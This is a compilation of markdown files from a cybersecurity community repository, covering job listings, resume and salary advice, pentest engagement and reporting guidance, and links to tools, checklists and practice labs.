- [5. Remote Jobs Search portal](#Remote-Jobs-Search-portal)
- [6. Apply Jobs at Startups for everyone](https://www.ycombinator.com/topcompanies)
--------------------------------------------------
## **0. Weekly Cybersecurity Hiring October 2022**
If you're looking for new opportunities then do check this out. We update jobs opening on Every Week.
- [ACCEIS](https://www.acceis.fr/), a french cybersecurity company, is looking for experienced [**pentesters**](https://www.acceis.fr/nos-offres-demploi/auditeur-en-cybersecurite/). The job is based on Rennes, France 🇫🇷 (hybrid remote, French citizenship required). [Other positions](https://www.acceis.fr/nos-offres-demploi/) are available too.
## **0. Weekly Cybersecurity Hiring September 2022**
- After recent Data Breach, [Uber opened multiple position for Senior Security Engineer roles at
Multiple Locations](https://www.uber.com/in/en/careers/list/?query=security)
- CYware have some [remote job Opening for you](https://cyware.com/careers)
- Browse the jobs ReturnOnSecurity.com curates and [apply for what matches your interests.](https://returnonsecurity.pallet.com/jobs)
- Muliple Jobs opening at ["forgepointcap"](https://jobs.forgepointcap.com/jobs)
- [Karl Sharman curated latest cybersecurity jobs](https://www.linkedin.com/feed/update/urn:li:activity:6891791435532775424/). All roles are based remotely in the US unless otherwise stated, and all salaries are base only. If you are interested, you can discuss via karl.sharman@stottandmay.com.
## **0. Weekly Cybersecurity Hiring Aug 2022**
**Week 01-05 Hiring - August 2022**
- [Cybersecurity-NxxT hiring Secuirty Intern](https://www.linkedin.com/posts/itsaftab_cybersecurity-internship-activity-6941036757408710657-Ld5G)
- [Q3 2022 Information security hiring](https://www.reddit.com/r/netsec/comments/w25lkc/rnetsecs_q3_2022_information_security_hiring/)
- [HCL campus Hiring - NOIDA(INDIA)](https://forms.office.com/r/TUPAWePirU)
- [Jumio is hiring for 2-3 YoE security engineer](https://jobs.jobvite.com/jumio-corporation/job/oIqxkfwJ)
- Pentesters Hiring - Trivandrum/kochi(INDIA) - Send resume to rawal.p@spectral.in
- Security Engineer/Sr Security Engineer for Appsec, GRC, Cyber Defense, Data Protection & Infosec roles.(Experience ranging from 3 to 9 years. Location - Bangalore ) If you are interested in exploring any of these opportunities. Please reach out to babitha.s@flipkart.com & chandana.c@flipkart.com for more details.
- Twitter Have New opening for Infosec. Please goto the https://twitter.com/career
## 1. Types of Company
[Credit iamthefrogy](https://github.com/iamthefrogy)
1. How many types of differnet Companies are there?
2. Which types of cCompanies do you choose in the intial career?
## 2. Types of High Paying Jobs & responsiblities
[Credit iamthefrogy](https://github.com/iamthefrogy)
----------------------------------------------------------------------------------
## 3. IT COMPANY offer Jobs
Index | Websites
-- | --
Cisco | (https://jobs.cisco.com/jobs/SearchJobs/security?21178=%5B207928%5D&21178_format=6020&listFilterMode=1)
Deliotte | (https://jobsindia.deloitte.com/)
Sisainfosec | [Provide cybersecurity service to almost all the series startups in India](https://www.sisainfosec.com/careers/)
IBM | (https://www.ibm.com/in-en/employment/)
Oracle | (https://eeho.fa.us2.oraclecloud.com/hcmUI/CandidateExperience/en/sites/CX_1/requisitions?location=India&locationId=300000000106947&locationLevel=country)
Jupiter Network | (https://careers.juniper.net/#/)
McAfee | (https://careers.mcafee.com/location/india-jobs/731/1269750/2)
Synopsys | (https://www.synopsys.com/careers/global/south-asia/india.html)
CloudSEK | (https://cloudsek.com/openings/)
Sentinelone | [Planning to invest $50million in India](https://www.sentinelone.com/careers/)
CyberArk | (https://careers.cyberark.com/)
Cyraacs | (https://cyraacs.com/careers/)
K7 Computing Pvt. Ltd | (https://careers.k7computing.com/)
Bugcrowd | (https://www.bugcrowd.com/about/careers/?gh_jid=676938#openings)
Hackerone | (https://www.hackerone.com/careers)
intigrti | (https://careers.intigriti.com/)
yeswehack | (https://jobs.yeswehack.com/en/)
RedTeam Hacker Academy Pvt. Ltd. | (https://redteamacademy.com/careers/)
FireCompass | (https://www.firecompass.com/careers/)
AppSecure | (https://www.linkedin.com/company/appsecuresecurity/?originalSubdomain=in)
Pentabug by AppSecure | (https://www.linkedin.com/company/pentabug/)
*Qualys - Pune opening | (https://www.qualys.com/careers/?p=search&q=research)
*Tenable - Atatck surface management| (https://careers.tenable.com/search/jobs)
More 120+ Company in Cybersecurity | (https://cybersecurityventures.com/cybersecurity-companies-list-hot-150/#hot-150/?view_15_per_page=150&view_15_page=1)
NOTE: For Such as IBM, Meta, Amazon, Netflix, Alphabet etc Recommend you to apply through reffral only.
Eg With referal you can attempt Interview thrice in month Alphabet if you're resume got selected.
## 4. Cybersecurity jobs at Startups
- [Cybersecurity jobs at Startups](https://www.ycombinator.com/companies?query=cybersecurity)
## 5. Remote Jobs Search portal
- Here's 14 websites to find remote cybersecurity and tech jobs:
Index | Websites
-- | --
1. | | Hired
2. | Flex Jobs
3. | Jobspresso
4. | Remote OK
5. | Just Remote
6. | JS Remotely
7. | Daily Remote
8. | Remote Leaf
9. | Remote Work
10. | Remote Leads
11. | AngelList Talent
12. | Working Nomads
13. | Product Hunt Jobs
14. | We Work Remotely
Index | Websites
-- | --
-> | (https://remoteok.com)
-> | (https://showwcase.com)
-> | (https://remotive.io)
-> | (https://remoteglobal.com)
-> | (https://devsnap.io)
-> | (https://workingnomads.co)
-> | (https://triplebyte.com)
-> | (https://nodes.co)
-> | (https://epicjobs.co)
-> | (https://remotehunt.com)
-> | (https://weworkremotely.com)
-> | (https://flexjobs.com)
## 6. [Apply Jobs at Startups for everyone](https://www.ycombinator.com/topcompanies)
================================================
FILE: CyberSecurityJobs/Readme.md
================================================
Welcome to [Resthacker Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-RESETHACKER) :)
[](#title-IT_JobHelpDesk)
[](#title-Advice)
[](#title-Cybersecurity_Domain)
For **Job**👨💼🧑💼 :
- Understand domain & choose your Goal.
- Find your Mentor.
- Validate your Career and Goal with Mentor.
- Complete the course(Free/paid) to intensify learning
- Build a Project, Resume & Cover letter.
- Attend 2 Mock - 1 with Community & 1 interview with your Mentor.
- Apply & Get a Job.
---
---
<span id="title-IT_JobHelpDesk"></span>
## 1. IT Job Helpdesk
Index | Topics
---|---
**0** | [Resume and cover letter tamplete](https://drive.google.com/drive/folders/1U2h882fksjfojdmcvPAeY-8TEZ1E3Oci?usp=sharing) & [Cover letter example](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/CoverLetter.md)
**0** | [CyberSecurity Mentorship](https://cybermentordojo.com/)
**1** | [Watch technical mock interviews with engineers from Google, Amazon, and more](https://interviewing.io/recordings/)
**2** | [Internships Opening](https://github.com/paralax/awesome-cybersecurity-internships)
**3** | [Jobs- Search](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md)
**4** | [Roles/disciplines best fit your abilities, experience, and interests in cybersecurity career.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/CybersecuityDiscipline.md)
<span id="title-Advice"></span>
## 2. Advice and more for cybersecurity Jobs
Index | JobsHelpDesk
---|---
**0** Cyber Career Pathways Tool | [Understand the Role & responsibility of Positions](https://niccs.cisa.gov/workforce-development/cyber-career-pathways-tool)
**0** Sans | [Popular Cybersecurity Postion in 2022 ](https://www.sans.org/cybersecurity-careers/20-coolest-cyber-security-careers/)
**1** Iamthefrogy | [Resume Advice](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/resume.md)
**2** Iamthefrogy | [Internship Advice](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Intership_Advice.md)
**3** Pnetsterlabs | [The interview for entry level cybersecurity Jobs](https://blog.pentesterlab.com/the-interview-9706357fd532)
**3** Cisco | [Job Searching & Interviewing](https://blogs.cisco.com/security/the-more-you-know-job-searching-interviewing)
**4** Jhaddix | [A hackers guide to FINDING cybersecurity jobs](https://www.jhaddix.com/post/a-hackers-guide-to-finding-cybersecurity-jobs)
**5** Placement Materials - Ankush Banik | [Aptitude solutions, Coding round and HR round](https://drive.google.com/drive/folders/1SkCOcAS0Kqvuz-MJkkjbFr1GSue6Ms6m)
**6** Salary Negotiation | [Updating More](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/SalaryNegotiation.md)
**7** [Interview Questions for cybersecurity domains](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md)
<span id="title-Cybersecurity_Domain"></span>
### 3. Cybersecurity Domain v2 - Richard Bejtlich's
Note : Do checkout "0. Popular Cybersecurity Postion in 2022 by sans"
Note: Contents inside the **RESETHACKER** is to help the community and all the content belongs to respective Authors and Team RESETHACKER.
================================================
FILE: CyberSecurityJobs/SalaryNegotiation.md
================================================
NOTE: Percentage of people that don't negotiate their salary are very high but If everything goes really smooth then you should negotiation it.
For Salary negotiation After hearing the offer form HR just maintain the silence for 10-15 Sec or It will be best if HR say something.
Then Thank them and Always add atleast 10% more from the offered salary or Based on market value or expected salary.
-> HR Says NO or Making excuse (Don't worry)
I was expecting b/w 12 Laks to 15 Lakhs. (give them hint)
-> If HR still says No then
Ask for Sign on bonus?
"Do you have **Sign on bonus** that will help me a lot and It'll maintan the Gap between offered salary and expected salary.
-> Still No or you have already an offer
Speak cleary, What you want ? and tell them about the offer.
-> Still no then
Give them the time or ask for the time period.
You'll get in middle for sure or may be you'll get your expected salary.
Updating More Soon .......
================================================
FILE: CyberSecurityJobs/internships.md
================================================
[Cybersecurity internship for Women](https://www.dsci.in/cyber-shikshaa/)
================================================
FILE: CyberSecurityJobs/resume.md
================================================
Index | Topics
-- | --
**1** | Resume Writing & Advise
**2** | LinkedIn – Why create a quality profile?
## 1. Resume Writing & Advise – How not to blunder?
[Credit:iamthefrogy](https://github.com/iamthefrogy)
Do you want to break into cybersecurity but don't have the experience to show on your resume?
No worries.
Here are ten great resume-building activities that will make you stand out from the competition: (Thanks to Naomi Buckwalter for compiling this list -
https://www.linkedin.com/in/naomi-buckwalter/)
1. Volunteer with a cybersecurity conference
2. Teach a cybersecurity class
3. Mentor a student
4. Join a cybersecurity working group
5. Contribute to an open-source project
6. Build a home lab
7. Start a blog
8. Guest on a podcast
9. Lead a study group
10. Start a cybersecurity meetup or club
11. Get a basic CEH, Security+ or equivalent cert
12. AWS, Azure, GCP, etc. certifications
13. Find a vulnerability in a reputed website (bug bounty)
14. Find zero-day and get a CVE id
Once you do the majority of these, you would have a good number of things to showcase in your resume and your Interview.
Below are some common resume blunders I have seen over the years. **Try to avoid it.**
## 2. LinkedIn Advice – Why create a quality profile?
[Credit:iamthefrogy](https://github.com/iamthefrogy)
One question to you, do you want to get noticed by reputable persons in your industry? Then it is a must to create a killer LinkedIn profile. Here are the steps
to create and maintain a perfect LinkedIn profile.
How to create a killer LinkedIn profile
## HacktheBox/TryHackme – Why create a quality profile?
Updating soon
## HackerOne/bugcrowd/Intigrity/yeswehack – Why create a quality profile?
Updating soon
## Codechef/Hackerearth etc - Why create a quality profile?
Updating soon
================================================
FILE: ISO-HelpDesk/Readme.md
================================================
# ISO HELPDESK
**1** [This article discusses "NIST Cybersecurity Framework vs ISO 27001/27002 vs NIST 800-53 vs Secure Controls Framework"](https://www.complianceforge.com/faq/nist-800-53-vs-iso-27002-vs-nist-csf-vs-scf)
> And help you decide which Cybersecurity Framework is right for your Organization?
================================================
FILE: LFI/Lfi.md
================================================
https://github.com/g0tmi1k/LFISuite
================================================
FILE: LFI/Lfitools.md
================================================
**LFI Tools**
Index | LFI Tools
---|---
**1** | [LFISuits](https://github.com/D35m0nd142/LFISuite)
================================================
FILE: LFI/Readme.md
================================================
**LFI(Local File Inclusion )**
Index | Content
---|---
**1** | [LFI Documentation]()
**2** | [LFI Practice labs]()
**3** | [LFI Disclosure/Reports/POC]()
**4** | [LFI Mindmap]()
**5** | [LFI Tools](/LFI/Lfitools.md)
**6** | [LFI Ebooks]()
**7** | [LFI Researchers]()
**8** | [LFI CVE]()
================================================
FILE: Pentesting Cheatsheets/Readme.md
================================================
# Pentesting Cheatsheets
Author | Title
-- | --
**1** I-red Team | [Pentesting Cheatsheets]( https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets )
**2** Chris Dale | [BurpSuite Cheatsheet v1.0](/.PentestingCheatsheets/cheetsheets.md)
**3** web pentesting Cheetsheet (Intermidiate fav)](https://github.com/riramar/Web-Attack-Cheat-Sheet)
================================================
FILE: Pentesting Cheatsheets/cheetsheets.md
================================================
# Pentesting Cheatsheets
Author | Title
-- | --
Chris Dale | [BurpSuite Cheatsheet v1.0](Pentesting Cheatsheets/cheetsheets.md)
## Hunting for Vulnerabilities with Burp Suite CheatSheet v1.0 :
-**Chris Dale** @chrisadale:- Users can contribute with extensions to aid in the
discovery of vulnerabilities. Be aware of false positives and use your pentesting capabilities to
ensure you fully explore the findings.
-Param Miner
>Allows high-performance identifying of unlinked
parameters. Check for unlinked GET and Headers,
and unlinked POST when applicable.
-Backslash Powered Scanner
>Will give alerts on interesting transformations of data
or other interesting things. Often, it will be false positives, but it allows the penetration tester to focus on potential vulnerabilities.
-Software Vulnerability scanner
>Checks software version numbers against
vulnhub.com for vulnerabilities.
-HTTP Request Smuggler
>This is an extension for Burp Suite designed to
help you launch HTTP Request Smuggling
attacks.
-Active scan++
>Allows us to find more vulnerabilities in terms of
suspicious input transformation, XML input
handling, host header attacks and more.
-Retire.js
>Finds outdated JavaScript and links to the
relevant CVE's for your investigations.
================================================
FILE: Pentesting-BugbountyINDEX.md
================================================
[ResourcesMindmap](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/ResourcesMindmap.md)
Pentesting-Bugbounty:(Readme.md)
Pentesting Sample Reports, timeline, quotation etc > PentestingReports
(PreEngagement.md & Readme.md)
Pentesting for Researchers
BugBounty-HelpDesk > Bugbounty
(burpsuite.md ,Wordlists.md, Website_inputs_testing.md, Getting_Started_with_Bugbounty & Readme.md)
Cybersecurity Jobs
CyberSecurity Conferences
1. Bugbounty >
burpsuite.md ,
Wordlists.md,
Website_inputs_testing.md,
Getting_Started_with_Bugbounty
& Readme.md)
3. BurpSuite >
Assets,
Readme.md ,
protips.md
3. CyberSecurityJobs > Readme.md
Careers
Intership_Advice.md
Readme.md
Remotejobs.md
internships.md
resume.md
4. PentestingReports/
PreEngagement.md
Readme.md
5. Pentesting_for_Researchers/
PTplatform.md
Readme.md (PEN TESTERS (INTERNAL AND EXTERNAL - Under Development))
4. Bugbountycheetsheet > Readme.md
bugbountyplatform.md
================================================
FILE: PentestingChecklist/Readme.md
================================================
# Checklist
Author | Checklist
-- | --
**1** six2dez | [Pentesting Web checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)
**2** Software Secured |[secure-code-review-checklist](https://github.com/softwaresecured/secure-code-review-checklist)
**3** Unknown | [WAPT Checklist](https://d.docs.live.net/7f17912d09b5e077/Documents/PEntesting.xlsx)
**4** Tushar Varma | [WAPT Checklist](https://alike-lantern-72d.notion.site/Web-Application-Penetration-Testing-Checklist-4792d95add7d4ffd85dd50a5f50659c6t )
**5** Hariprasaanth | [THICK CLIENT PENTESTING CHECKLIST](https://hariprasaanth.notion.site/THICK-CLIENT-PENTESTING-CHECKLIST-35c6803f26eb4c9d89ba7f5fdc901fb0)
**6** Hariprasaanth | [Web Application PENTESTING CHECKLIST](https://hariprasaanth.notion.site/hariprasaanth/WEB-APPLICATION-PENTESTING-CHECKLIST-0f02d8074b9d4af7b12b8da2d46ac998)
**6** dafthack | [CLoud pentesting](https://github.com/dafthack/CloudPentestCheatsheets)
**7** mantisSTS | [A list of web application checks sorted by functionality](https://github.com/MantisSTS/Web-Application-Hacking-List)
**7** mantisSTS | [IOS Pentesting](https://ios.pentestglobal.com/)
================================================
FILE: PentestingReports/PreEngagement.md
================================================
# Pre-engagement:
Help yourself to get your 1st Pentesting client and prepare yourself for client meeting?
## UNDERSTAND THE TARGET:
## Understanding will help you tailor the test and test results
## WHAT IS NEEDED TO TEST?
### TEST TYPES
## SCOPE :
## RULES OF ENGAGMENT
### CAN THINGS GO WRONG? - answer is YES.
### OTHER THINGS TO PLAN (In case you have team of pentesters or running a company)
## LEGAL REQUIRENMENTS FOR PENTESTING:
## Pentest report structure
## If you are the Bringing out the clients for organization
### IF YOU ARE THE REPORT RECIPIENT
## HelpDesk & Reference :
### PPre-engagement interaction (Recommended)
### Executive Reporting tamplate
### Technical Reporting tamplate
### A three-part video series on pen testing by Tim Medin(@timmedin)
## Understanding Pre-enganement:
Obtained Legal Permission -> Written Permission from persons in authourity.
|
Rules of Engagement -> Defines the scope of the penetration test.
|
NDA - > Signed agreement b\w cleint and provider.
|
Begin Penetration Testing
## What are the legal considerations for pentests?
For pentests, you need to have a contract in place before starting the engagement.
The contract is often referred to as your get-out-of-jail-free card, but keep in mind
that you could still be arrested for performing a pentest even if it's authorized.
Some other key legal considerations are outlined here:
*Legal Authority* - Does the client really own the systems and/or applications they want you to test?
*Damage Control* - Will the client assume liability for any interruptions or damage that occur as a
result of the pentest, or are you responsible?
*Hack-back* - What happens when third-party data or services are damaged as a result of the
pentest? Who is responsible?
*Licensing* - Do you need a private investigator license and Certification (gpen,cept, lpt and private investigator license) to perform a pentest?
*Privacy Issues* - Which jurisdiction will be recognized for the pentest? For example, if you are testing offices in Alabama and Virginia,
which state's laws will apply to the engagement?
*Data Ownership* - Who owns any new methods or tools that are developed as a result of the pentest engagement?
*Duty To Warn* - Is there a duty to warn third parties about pentest results based on the findings?
For example, you discover a high-severity zero-day exploit as a result of a pentest.
Do you report it?
Scope of Work
Professionalism
## What are the Methodology/phases of pentesting?
This question could have different answers, depending on the hiring manager having real pentesting experience
or just passing a few knowledge-based certification exams.
If you go by the penetration testing execution standard (PTES), there are seven
phases of pentesting, which are pre-engagement, intelligence gathering, threat
modeling, vulnerability analysis, exploitation, post-exploitation, and reporting.
If you take a popular knowledge-based certification exam, the phases are
reconnaissance, scanning and enumeration, gaining access, maintaining access, and
covering tracks
## UNDERSTAND THE TARGET:
Tester: You need to work to understand the target to design a better test
Testees: You need to understand yourself so you can steer the test and design
Recipients: What do you want from the test? What kind of output?
Best Advise : NEVER ASSUME - Ask the dumb question
eg :
“I can guess, but I don’t like to be wrong, so can
you describe for me what data or process if lost,
destroyed, stolen, or leaked would cause the
greatest damage to your organization?”
## Understanding will help you tailor the test and test results
Why is the test being done? Compliance? Improved posture?
Who is the size/class of yout network?
What are the security goals and goal of pentesting?
How many Ip's the nerwork have?
How many web pages and input form the application have?
What are the *biggest risks* to the org?
You need to identify the goals of pentesting and BUSINESS RISK of client.
## WHAT IS NEEDED TO TEST?
Organizational goals will define the test.
Sometimes the test type is the first point, sometimes it is scope.
It all depends on the goals and background information.
1. Scope
2. Types of tests
And Rules of engagement
### TEST TYPES
Network pentesting (Internal Network & External Network also include by bypassing IDS & IBS)
Assumed Breach
Egress & C2 testing
Red Team
Purple Team
Phishing
Social Engineering
*Web App & API testing
*Mobile App pen testing
cloud penitration testing
Wireless pen testing
Hardware/physical pentesting
Many others...
## SCOPE :
What is in scope? – This determines time (and cost)
What is out of scope?
Yes, this is the same question, but ask it too and
you will get extra information
Why is it out of scope?
What is owned by someone else?
## RULES OF ENGAGMENT
What can *testers do* without additional permission?
What should *testers not do* without additional permission?
Usually pretty simple, simple enough to be a simple list
Pre-approve engagement potentially are more dangerous attacks, such as password guessing.
All other "riskier/ENGAGMENT" things need approval.
### CAN THINGS GO WRONG? - answer is YES.
Most common Systems crash on their own and there is an increased risk with atypical traffic.
Does it happen all the time? No
Can it? Of course
Never guarantee 100% uptime, because no SLAs are 100%
And Learn from mistakes (redsiege.com/askus)
### OTHER THINGS TO PLAN (In case you have team of pentesters or running a company)
Contact numbers for testers and target, including backups
Secure communication methods
Regular discussion times on longer tests
For longer create follow up tamplete to keep up with clients.
Advice for ORG: Always ROTATE TESTING in ORGS.
If you never rotate, you will go out of business almost immediately.
For indivisual pentester:
Don't be affered to approch the ORGS for TESTING.
ORGS Maybe looking for different testers after a certain time.
## What is the content of a well-written pentest report?
The typical penetration test report is structured in the followed sections:
1. Cover page and Vulnerability Title
2. info (Table of content )
3. Executive Summary, technical report Summary
- An executive summary should be one page or less and should highlight exciting pieces of the report's findings.
Think of this part as marketing, and you need to get the stakeholder to buy what you are selling
so that they finish reading the full report.
4. Mode of operating (Methodology & also include OWASP Risk Rating)
5. A copy of original Test Scope of work that signed as part of contract.
- (Company checklist as per as clients requirenmets or company/indivisual own clecklist)
6. Findings Summary
- A summary of vulnerabilities that you found. A simple pie-chart graphic works well for this if you
categorize the vulnerabilities.
7. Details of the testing team and tools that were used in the engagement
8. Findings (Include Vulnerability Title, Vulnerability Type, POC- steps to reproduce, SS , links, impact, CVSS Score, suggestion to fix etc)
9. Recommendations(Final Thoughts & Tips)
10. Appendix (Appendices)
Revisions (Change history after submitting the report to client)
## If you are the Bringing out the clients for organization
0. As a Tester, you need to understand Attackers have a near infinite amount of time
No one is going to pay an infinite amount of money*
So Set a realistic duration to get optimal results.
1. Clients may just ask you to conduct pen test and don't know all the technical details and expect a good test.
It's your Job is to teach test types and understand there requirenment by asking the righ questions, not shame them.
2. Testers need to be available for outages, questions, or external compromise.
3. Testers must Know your procurement process! and know their holiday schedule!
4. If the target doesn't improve their security posture, you have been a waste of time.
### IF YOU ARE THE REPORT RECIPIENT
Ask for what you want ahead of time
eg Some orgs want data in a spreadsheet or CSV , may ask for executive report or developer report etc
Does the sample report have the info you want or need?
Use the pen testers! Setup a debrief call to go through the report if you need it!
## Reference :
### [Pre-engagement Interactions](https://pentest-standard.readthedocs.io/en/latest/preengagement_interactions.html)
### Executive-Level Reporting
Business Impact
Customization
Talking to the business
Affect bottom line
Strategic Roadmap
Maturity model
Appendix with terms for risk rating
### Technical Reporting
Identify systemic issues and technical root cause analysis
Maturity Model
Technical Findings
Description
Screen shots
Ensure all PII is correctly redacted
Request/Response captures
PoC examples
Ensure PoC code provides benign validation of the flaw
Reproducible Results
Test Cases
Fault triggers
Incident response and monitoring capabilities
Intelligence gathering
Reverse IDS
Pentest Metrics
Vuln. Analysis
Exploitation
Post-exploitation
Residual effects (notifications to 3rd parties, internally, LE, etc…)
Common elements
Methodology
Objective(s)
Scope
Summary of findings
Appendix with terms for risk rating
## How do you measure the results of a pentest?
It depends on what the organization is looking to measure. Common things to track are the criticality of findings,
how many issues that surfaced in the pentest actually get fixed, what types of vulnerabilities and exploits are
being discovered, and which new issues have been identified since the last pentest.
## How often should organizations have an external pentest performed?
This answer depends on their compliance requirements, but generally, this should happen at least once a year
and preferably on a quarterly basis. One thing you will notice when you're working as a pentester is that
many companies will not fix any of the issues you report, so you might come back a year later and identify the
same issues.
### A three-part video series on pen testing by Tim Medin(@timmedin)
[PART 1: THE START ](https://youtu.be/23F8QKTu86U)[Pentest process.pdf](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/files/9042034/Pentest.process.pdf)
[PART 2: THE METHOD](https://redsiege.com/pentestprocess2) [Slides](http://www.redsiege.com/wp-content/uploads/2021/03/20210309-PEN-TEST-PROCESS-P2-THE-METHOD.pdf)
[PART 3: THE REPORT](https://www.youtube.com/watch?v=oyJ0atDagco) [Slides](https://redsiege.com/pentestprocess3)
================================================
FILE: PentestingReports/Readme.md
================================================
Note: Contents inside the **RESETHACKER** is to help the community and all
The content belongs to the respective authors and Team RESETHACKER.
1. [Pentesting Pre-Engagements Advice](#Pentesting-Pre-Engagements-Advice)
2. [Pentesting NDA & Saas Aggrement form ](#Saas-Agrement-form)
3. [Pentesting Report Samples:](#Pentesting-Report-samples)
4. [Pentesting Report videos - How to write pentest Report?](#Pentesting-Videoes-How-to-write-pentest-report?)
5. [Pentesting Timelines](#Pentesting-timelines)
6. [Penetration quotation](#Penetration-quotation)
## [Pentesting Pre-Engagements Advice](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/PentestingReports/PreEngagement.md)
✅ Pre-engagement:
- Help yourself to get your 1st Pentesting client and prepare yourself for client meeting?
✅ UNDERSTAND THE TARGET:
✅ Understanding will help you tailor the test and test results
✅ WHAT IS NEEDED TO TEST?
- TEST TYPES
✅ SCOPE :
✅ RULES OF ENGAGMENT
- CAN THINGS GO WRONG? - answer is YES.
- OTHER THINGS TO PLAN (In case you have team of pentesters or running a company)
✅ LEGAL REQUIRENMENTS FOR PENTESTING:
✅ Pentest report structure
✅ If you are bringing out the clients for organization
- IF YOU ARE THE REPORT RECIPIENT
✅ Reference : A three-part video series on pen testing by Tim Medin(@timmedin)
## Pentetsing NDA & Saas Aggrement form
- [NDA & SaaS Agrements form](https://drive.google.com/drive/folders/1dvUVNM5WnV9sFWL0BVHvJUNP44_bqhRj?usp=sharing)
- [Pentesting Agreements form](https://drive.google.com/file/d/1qA2_K5mYqYwhzKYnAJ7WPsktZ9kWlQEI/view?usp=sharing)
## Pentesting Report Samples:
Index | Pentesting Report Sample
---|---
**1** | [By Resethacker (Vikram) ](/.pdfs/FinalV1.pdf)
**2** | [Public Pentesting Reports by juliocesarfort](https://github.com/juliocesarfort/public-pentesting-reports)
**3** | [Web Application Pentesting report sample by SecurityBoat(Ninad Mathpati)](https://ninadmathpati.com/Web%20Application%20Pen%20Test%20Report.pdf)
**4** | [Public Pentesting Reports by pentestreports.com](https://pentestreports.com/reports/)
## Pentesting Videoes - How to write pentest report ?
Index | Pentesting Vdeoes
---|---
**1** | [Penetration testing - How to write pentest Report](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/PentestingReports/pentestingvideos.md)
## Pentesting Timelines
Most pentesting people ask this question "What time investment do you estimate for a penetration test?
The time investment for a penetration test varies from case to case depending on the systems to be tested and the individual test requirements.
Usually, the time needed ranges from a few days to several weeks. One goal of the preliminary meeting is to get enough information about
the systems to be tested to estimate the optimal length/time for the penetration test.
Author | Pentesting Timelines
-- | --
**1** securitymetrics | [Penetration Testing Timeline](https://www.securitymetrics.com/content/dam/securitymetrics/PDF-files/Penetration_Testing_Timeline_Checklist.pdf)
#### Penetration Testing Timeline for enterprices
✅1. SCHEDULING
2-4 Months Before Penetration Test
✅2. TESTING PREPARATION
5 Weeks Before Penetration Test
✅3. AUTOMATED/MANUAL TESTING
During Penetration Test
✅4. REPORTING
0-6 Weeks After Penetration Test
✅5. REMEDIATION
0-3 Months After Penetration Test
✅6. RETESTING
0-3 Months After Penetration Test
✅7. AFTER RETESTING
Ongoing
## Pentesting Quotation
Author | Pen testing Quotation
-- | --
**1** Updating Soon | [Penetration Quotation - Updating Soon]()
================================================
FILE: PentestingReports/pentestingvideos.md
================================================
Index | Pentest Videos
-- | --
**1** | [Pentest Reporting and Best Practices -HackerOne](https://www.youtube.com/watch?v=6QIrXgPGJhM)
**2** | [Penetration Testing Reporting -Lord Saibat](https://www.youtube.com/watch?v=6SqAXl24QaM)
**3** | [Writing a Pentest Report -The Cyber Mentor](https://youtu.be/EOoBAq6z4Zk)
**4** | [Tips for How to Create a Pen (Penetration)(Testing Report - Download Report Sample](https://pentestreports.com/video/nez4sfjjwvu)
**5** | [OSCP Report Made Easy -Michael LaSalvia](https://www.youtube.com/watch?v=O9JWmF3Bgis)
**6** | [OSCP - How to Write the Report -Conda](https://www.youtube.com/watch?v=Ohm0LhFFwVA)
**7** | [Pen Test Process: The Report -Red Siege](https://www.youtube.com/watch?v=oyJ0atDagco)
**8** | [Public Penetration Test Reports - Learning Resource LiveOverflow](https://www.youtube.com/watch?v=qNLMuls2BBA)
**9** | [Writing Reports: The Overlooked Pen Testing Skill | Pen Test HackFest Summit 2021 -SANS Offensive Operations](https://www.youtube.com/watch?v=r-6LBjlM14Y)
**10** | [Why a Pentesting Report is extremely important? -EC Council](https://www.youtube.com/watch?v=tbuU0uzU-oI)
**11** | [Pentest Report Writing Made Simple (No MS Office) -Zanidd](https://www.youtube.com/watch?v=u_-b_JIqPbs)
================================================
FILE: Pentesting_for_Researchers/PTplatform.md
================================================
## FREE LABS TO TEST YOUR PENTEST/CTF SKILLS 👩💻👀
Index | Websites
-- | --
- | [SANS Challenger](http://www.smashthestack.org/wargames.html)
- | [SmashTheStack](https://www.holidayhackchallenge.com/2021/)
- | [The Cryptopals Crypto Challenges](https://cryptopals.com)
- | [Try Hack Me](https://tryhackme.com)
- | [Vulnhub](https://vulnhub.com)
- | [W3Challs](https://w3challs.com)
- | [Academy Hackaflag BR](https://hackaflag.com.br)
- | [Attack-Defense](https://attackdefense.com)
- | [Alert to win](https://alf.nu/alert1)
- | [CTF Komodo Security](https://ctf.komodosec.com)
- | [CMD Challenge](https://cmdchallenge.com)
- | [Explotation Education](https://exploit.education)
- | [Google CTF](https://lnkd.in/e46drbz8)
- | [HackTheBox](https://hackthebox.com)
- | [Hackthis](https://hackthis.co.uk)
- | [Hacksplaining](https://lnkd.in/eAB5CSTA)
- | [Hacker101](https://ctf.hacker101.com)
- | [Hacker Security](https://lnkd.in/ex7R-C-e)
- | [Hacking-Lab](https://hacking-lab.com)
- | [HSTRIKE](https://hstrike.com)
- | [ImmersiveLabs](https://immersivelabs.com)
- | [NewbieContest](https://lnkd.in/ewBk6fU5)
- | [OverTheWire](http://overthewire.org)
- | [Practical Pentest Labs](https://lnkd.in/esq9Yuv5)
- | [Pentestlab](https://pentesterlab.com)
- | [Penetration Testing Practice Labs](https://lnkd.in/e6wVANYd)
- | [PentestIT LAB](https://lab.pentestit.ru)
- | [PicoCTF ](https://picoctf.com)
- | [PWNABLE](https://lnkd.in/eMEwBJzn)
- | [Root-Me](https://root-me.org)
- | [Root in Jail](http://rootinjail.com)
- | [WeChall](http://wechall.net)
- | [Zenk-Security](https://lnkd.in/ewJ5rNx2)
================================================
FILE: Pentesting_for_Researchers/Pentest-Reports.md
================================================
